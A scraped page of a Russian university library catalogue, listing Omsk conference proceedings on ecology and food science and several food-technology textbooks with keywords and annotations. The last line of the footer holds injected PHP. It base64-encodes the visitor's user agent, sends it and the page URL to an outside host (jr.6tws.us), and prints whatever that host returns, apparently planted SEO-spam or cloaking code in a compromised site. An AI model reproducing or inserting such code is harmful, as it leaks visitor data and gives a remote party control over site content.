    Кл. слова: СУШКА распылительная, МОЛОКО сухое
  • Погребняк, А. И. Бизнес ресторанных услуг и проблема питания сибиряков на рубеже XX – XXI вв / А. И. Погребняк. - с.123-133
    Кл. слова: БИЗНЕС РЕСТОРАННЫЙ
  • Приступа, О. А. Ультраструктурная характеристика патологического процесса в центральной нервной системе животных при аутомутиляции / О. А. Приступа, Т. А. Беспалова. - с.134-139
  • Пронович, О. Н. Ценностный аспект глобального экологического кризиса / О. Н. Пронович. - с.140-142
    Кл. слова: КРИЗИС ЭКОЛОГИЧЕСКИЙ
  • Шадрин, М. А. Пищевая комбинаторика как фактор решения проблем при разработке новых технологий продуктов питания / М. А. Шадрин. - с.146-148
    Кл. слова: КОМБИНАТОРИКА
Держатели документа (Информация об экземплярах) 
17. 
Всемирный день охраны окружающей среды (Экологические чтения - 2011) [Текст] : материалы открытой науч.-практ. конф. (3 июня 2011 г.) / Комиссия по вопросам экологии, охране окружающей среды и безопасности жизнедеятельности Общественной палаты Омской обл., Муниципальное образоват. учреждение доп. образования детей "Детский эколого-биологический центр", АНО ВПО "Омский экономический ин-т", Детско-юношеская общественная организация "Экологический центр", Отдел водных ресурсов Нижне-Обского бассейнового водного управления по Омской обл., 2011. - 323 с.
Ключевые слова 
Оглавление 
  • Екимов, В. Лекарственные растения окрестностей деревни Короленка / В. Екимов, Н. П. Кальк. - с.10-41
    Кл. слова: РАСТЕНИЯ ЛЕКАРСТВЕННЫЕ
  • Колпакова, Т. Ю. Некоторые вопросы гнездования буроголовой гаички (Раrus аtricapilus) в Омской области / Т. Ю. Колпакова, Т. М. Водопьянова. - с.41-45
    Кл. слова: гаичка, ОМСКАЯ ОБЛАСТЬ - ПТИЦЫ
  • Короблева, А. Влияние температуры и солености воды на двигательную активность шпорцевых лягушек / А. Короблева, Т. М. Водопьянова. - с.45-47
    Кл. слова: ЛЯГУШКА
  • Кузьменко, Н. К. Травянистая флора территории Омского экономического института / Н. К. Кузьменко, В. М. Ягодкина. - с.48-65
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ФЛОРА
  • Курманова, А. Изучение растительности долины реки Оши / А. Курманова, И. Биякова, Н. А. Каравайская. - с.65-67
  • Шевчук, В. В. Изучение некоторых биоэкологических особенностей и ареала углозуба сибирского / В. В. Шевчук, Н. В. Уварова. - с.68-75
  • Шелементьев, Д. Г. Редкие и исчезающие растения окрестностей с. Ложниково Тарского района Омской области / Д. Г. Шелементьев, Е. А. Шелементьева. - с.76-82
    Кл. слова: РАСТЕНИЯ ИСЧЕЗАЮЩИЕ
  • Щербина, Е. Создание механизма парникового эффекта и его влияние на развитие травянистых растений / Е. Щербина, Т. М. Водопьянова. - с.83-87
    Кл. слова: ЭФФЕКТ ПАРНИКОВЫЙ
  • Яковлева, А. Влияние видов кормов на рост и развитие мадагаскарских шипящих тараканов (Gromphadorhina portentosa) / А. Яковлева, Е. Гашникова, Т. С. Потерюхина. - с.87-92
  • Бабей, Н. И. Радиологические показатели хлеба, хлебобулочной и колбасной продукции омских товаропроизводителей / Н. И. Бабей [и др.]. - с.93-97
    Другие авторы: Довгалева Н. А., Самарцев И. А., Королев А. Н.
  • Гебель, А. Жевательная резинка: вред или польза? / А. Гебель, А. Давыденко, Е. А. Гладышева. - с.98-108
  • Карачаев, В. Изучение влияния тепловой обработки на качество подсолнечного масла / В. Карачаев, И. Н. Бондаревская. - с.108-116
  • Кузнецова, В. Экологическое значение йода в жизни человека / В. Кузнецова, В. Чикрина, О. Ю. Мельникова. - с.116-122
    Кл. слова: ЙОД
  • Норышева, Р. А. Исследование физико-химических показателей качества молока / Р. А. Норышева, С. Н. Базева. - с.122-127
    Кл. слова: МОЛОКО - КАЧЕСТВО, ПОКАЗАТЕЛЬ ФИЗИКО-ХИМИЧЕСКИЙ
  • Норышева, Р. А. Исследование и сравнительный анализ физико-химических показателей качества майонеза разных торговых марок / Р. А. Норышева, Н. В. Малая. - с.128-133
    Кл. слова: МАЙОНЕЗ
  • Норышева, Р. А. Исследование показателей качества шоколада / Р. А. Норышева, Т. С. Полуянова. - с.134-137
    Кл. слова: ШОКОЛАД
  • Норышева, Р. А. Исследование факторов, формирующих содержание массовой доли влаги в продуктах питания (на примере вареной бутербродной колбасы) / Р. А. Норышева, Н. В. Почалова. - с.138-142
    Кл. слова: КОЛБАСА ВАРЕНАЯ, ВЛАГА
  • Чабан, В. Загрязнение окружающей среды жевательной резинкой / В. Чабан, Т. М. Водопьянова. - с.142-144
    Кл. слова: РЕЗИНКА ЖЕВАТЕЛЬНАЯ
  • Азизова, М. А. Су есiмдiктерi - су коймасынын биокерсеткiштерi / М. А. Азизова, М. Д. Мухамадиева. - с.145-153
  • Баусова, Ю. Ключик на реке Монастырке: новая жизнь / Ю. Баусова, Е. Б. Резникова. - с.153-158
  • Берикова, М. Наименование ООПТ (особо охраняемая природная территория): ГУ Государственный лесной природный резерват "Семей орманы" / М. Берикова, М. Амангельдинова, Р. К. Абдилова. - с.158-162
  • Ивкин, А. Влияние автотранспорта на экологическую обстановку микрорайона, прилегающего к улице Дианова в г. Омске / А. Ивкин [и др.]. - с.162-166
    Другие авторы: Матвеев М., Турушев А., Виноградченко Н. Н., Краснова О. Н., Левина В. Т.
    Кл. слова: ОМСК - ЭКОЛОГИЯ
  • Королев, А. Н. Экологические риски современности и экология лесов / А. Н. Королев. - с.166-173
    Кл. слова: РИСК ЭКОЛОГИЧЕСКИЙ, ЛЕС - ЭКОЛОГИЯ
  • Лапенко, А. Исследование и охрана гидроэкологического каркаса бассейнов реки Оми на территории города Омска и его пригородов / А. Лапенко [и др.]. - с.173-176
    Другие авторы: Тимиров Р., Бочарова Л. Ж., Валитов Р. Г.
    Кл. слова: ОМСК - ВОДОЕМЫ
  • Мельникова, О. Ю. Перспективы развития биосферы / О. Ю. Мельникова. - с.176-180
    Кл. слова: БИОСФЕРА
  • Разживина, И. Экологическое состояние малых рек Городецкого района / И. Разживина [и др.]. - с.181-189
    Другие авторы: Боброва В., Бондарцева А., Резчикова Е. Б.
  • Разживина, И. Спасское озеро - история и реальность / И. Разживина, Е. Б. Резчикова. - с.190-195
  • Чегаева, К. В. Влияние атмосферных выбросов полиметаллической пыли на уровень заболеваемости органов дыхания / К. В. Чегаева. - с.195-198
    Кл. слова: ЗАГРЯЗНЕНИЕ АТМОСФЕРЫ, ЗАБОЛЕВАНИЕ органов дыхания
  • Беспалова, Т. А. Эколого-эпизоотические аспекты современного состояния природной очаговости бешенства в России. Характеристика возбудителя / Т. А. Беспалова [и др.]. - с.199-208
    Другие авторы: Приступа О. А., Масалыкина А. В., Семенова А. С., Григорьева А. С.
  • Беспалова, Т. А. Микробный пейзаж почвы и методы его определения / Т. А. Беспалова [и др.]. - с.209-215
    Другие авторы: Приступа О. А., Рассказова В. Н., Гончаров Д. О.
    Кл. слова: ПОЧВА
  • Вачева, О. Н. Влияние селена на численность микроорганизмов в лугово-черноземной почве южной лесостепи Омской области / О. Н. Вачева, А. В. Синдирева. - с.209-215
    Кл. слова: СЕЛЕН
  • Ершова, К. С. Влияние кадмия на активность фермента аскорбатоксидазы фасоли / К. С. Ершова. - с.220-223
    Кл. слова: кадмий, ФАСОЛЬ
  • Калибасова, Я. Экология... / Я. Калибасова, М. Биахметова, Р. К. Абдилова. - с.223-228
    Кл. слова: ПРОБЛЕМА ЭКОЛОГИЧЕСКАЯ
  • Карелина, А. А. Современный мобильный телефон и здоровье человека / А. А. Карелина, С. Н. Хватова, А. Г. Мордвинов. - с.228-231
    Кл. слова: ТЕЛЕФОН СОТОВЫЙ, ЗДОРОВЬЕ ЧЕЛОВЕКА
  • Каскевич, М. А. Влияние вредных веществ на здоровье учащихся и соблюдение санитарно-гигиенических норм при организации лабораторных работ / М. А. Каскевич, Б. С. Гайсина, П. Р. Аканова. - с.232-235
    Кл. слова: ВЕЩЕСТВО ВРЕДНОЕ, ЗДОРОВЬЕ УЧАЩИХСЯ
  • Келлер, В. А. Влияние цинка на активность каталазы семейства бобовых / В. А. Келлер. - с.236-239
    Кл. слова: ЦИНК
  • Кеньжебулатова, Ж. Влияние близкой посадки пряновкусовых трав на повреждение лука-репки луковой мухой / Ж. Кеньжебулатова, О. В. Черномазова. - с.239-242
    Кл. слова: МУХА ЛУКОВАЯ, ПРЯНОСТИ
  • Колодежная, В. Н. Экологическое образование и воспитание школьников через систему социализации / В. Н. Колодежная. - с.243-246
    Кл. слова: ОБРАЗОВАНИЕ ЭКОЛОГИЧЕСКОЕ
  • Кравцова, Е. Экологическое состояние березовой рощи поселка 40 лет Октября в ОАО г. Омска / Е. Кравцова [и др.]. - с.247-249
    Другие авторы: Нагибина М., Лагутина В., Серебрянникова Г. А.
    Кл. слова: ОМСК - ЭКОЛОГИЯ
  • Мелехин, Р. А. Первичная профилактика наркомании в вузе как экологическая проблема / Р. А. Мелехин, С. Н. Хватова, А. Г. Мордвинов. - с.249-254
    Кл. слова: НАРКОМАНИЯ - ПРОФИЛАКТИКА
  • Мельникова, О. Ю. Отдельные аспекты становления экологического образования и воспитания в России / О. Ю. Мельникова, Е. А. Оробинская. - с.255-258
    Кл. слова: ВОСПИТАНИЕ ЭКОЛОГИЧЕСКОЕ
  • Саматов, А. П. Психологические барьеры общения современных подростков / А. П. Саматов, А. Г. Мордвинов. - с.259-264
    Кл. слова: ОБЩЕНИЕ ПОДРОСТКОВ, ПОДРОСТОК
  • Самович, А. А. Изучение проблемы бездомных животных как фактор формирования субъективного отношения к природе / А. А. Самович, Е. А. Оробинская. - с.265-269
    Кл. слова: ЖИВОТНЫЕ БЕЗДОМНЫЕ
  • Терещенко, С. Ю. Микробиологическая активность и химический состав лугово-черноземной почвы в условиях применения селена / С. Ю. Терещенко, А. В. Синдирева. - с.269-273
  • Торехан, М. Е. Влияние природного радиоактивного фона па репродуктивное здоровье человека / М. Е. Торехан, Б. Т. Чергизова. - с.273-279
  • Чмелева, О. Изучение гибридных сортов огурцов в природно-климатических условиях Нововаршавского Омской области / О. Чмелева, О. В. Черномазова. - с.280-285
    Кл. слова: ОГУРЦЫ ГИБРИДНЫЕ
  • Шлыкова, О. А. Экология человека на примере истории водоема в центре села Троицкое Омского муниципального района Омской области / О. А. Шлыкова, Л. Н. Дежурова. - с.286-291
    Кл. слова: ЭКОЛОГИЯ ЧЕЛОВЕКА
  • Зяткевич, М. Экологическое воспитание школьников через знакомство с Красной книгой / М. Зяткевич, О. О. Степанова. - с.291-297
    Кл. слова: ВОСПИТАНИЕ ЭКОЛОГИЧЕСКОЕ
  • Иванова, С. В. Выявление самых загрязненных районов города Омска / С. В. Иванова, Е. В. Вставская. - с.297-303
    Кл. слова: ОМСК - ЭКОЛОГИЯ
  • Лямцева, Е. В. Изучение влияния транспорта на атмосферу / Е. В. Лямцева, Е. В. Вставская. - с.303-309
    Кл. слова: ТРАНСПОРТ - ЭКОЛОГИЯ
  • Малофеева, А. Хранители плодородия. Земляные черви / А. Малофеева [и др.]. - с.309-311
    Другие авторы: Шелудивченко О., Нечепуренко В. Н., Зырянкина Н. В.
    Кл. слова: ЧЕРВЬ ЗЕМЛЯНОЙ
  • Писаренко, А. Определение плодородия почв / А. Писаренко, Н. П. Бурова. - с.311-315
    Кл. слова: ПОЧВА
  • Супрунюк, Л. В. Влияние синтетических моющих средств на окружающую среду / Л. В. Супрунюк, А. В. Лобов. - с.316-319
    Кл. слова: СРЕДСТВА МОЮЩИЕ - ЭКОЛОГИЯ
  • Терлеева, О. И. Пылевое загрязнение в современном городе / О. И. Терлеева. - с.319-323
    Кл. слова: ПЫЛЬ - ЭКОЛОГИЯ
Держатели документа (Информация об экземплярах) 
18. 
Товароведение однородных групп продовольственных товаров [Текст] / ред. Л. Г. Елисеева, 2014. - 929 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МАРКИРОВКА ТОВАРА -- УПАКОВКА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ТОВАРЫ ПЛОДООВОЩНЫЕ -- ПОТЕРИ ПЛОДОВ -- ПОТЕРИ ОВОЩЕЙ -- КОНСЕРВИРОВАНИЕ ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРИСТЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- СПРЕД -- МАЙОНЕЗ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОРОЖЕНОЕ -- МАРКИРОВКА МОЛОЧНОЙ ПРОДУКЦИИ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ ДЕТСКОЕ -- МЯСО -- МЯСО ПТИЦЫ -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ

Учебник подготовлен в соответствии с образовательным стандартом третьего поколения – ФГОС ВПО по направлению подготовки «Товароведение» по базовой дисциплине профессионального цикла «Товароведение однородных групп продовольственных товаров».

В нем рассматриваются основные понятия и задачи товароведения продовольственных товаров, научные принципы систематизации и классификации продовольственных товаров, факторы, влияющие на формирование и сохранение их потребительских свойств. Дана характеристика пищевой ценности и потребительских свойств однородных групп продовольственных товаров, представлены современные принципы их классификации и кодирования, изложены требования к качеству и безопасности, рассмотрены основные дефекты и причины их возникновения, режимы хранения и сроки годности.

Для студентов бакалавриата, обучающихся по направлениям подготовки «Товароведение», «Торговое дело», «Технология продукции и организация общественного питания» и «Экономика».

19. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
20. 
Машины и аппараты пищевых производств [Текст] : учеб. для вузов по направлению подгот. дипломир. специалистов "Пищевая инженерия": в 3 кн. / под ред. В. А. Панфилова. Кн. 1 / С. Т. Антипов [и др.], 2009. - 607, [1] с.
Держатели документа (Информация об экземплярах) 

В учебнике обобщены сведения о состоянии и перспективе технического обеспечения пищевых и перерабатывающих производств. Особое внимание уделено проблемам, стоящим перед специалистами в деле повышения эффективности машинных технологий продуктов питания. Представлены современные формы организации технологических комплексов, а также машинно-аппаратурные схемы линий для переработки сельхозсырья растительного и животного происхождения, а также морепродуктов в продукты питания. Изложены научные основы реализуемых процессов и инженерные расчеты важнейших характеристик машин и аппаратов. Описано оборудование для ведения механических, гидромеханических, тепломассообменных и биотехнологических процессов, а также для дозирования и упаковывания пищевых продуктов. Рассмотрены методы организации технического обслуживания и ремонта оборудования, приоритетные научные проблемы и инженерные задачи развития пищевых производств, вопросы организации создания новой техники.

21. 
Тенденции формирования профессиональной компетентности специалистов торгово-экономического профиля [Текст] : Часть 2: научное издание / ОИ (филиал) РГТЭУ. Омские студенческие торгово-экономические чтения (IV ; 2008), 2008. - 408 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2906 - 25.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.02 с.20 запросов, 1.62c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;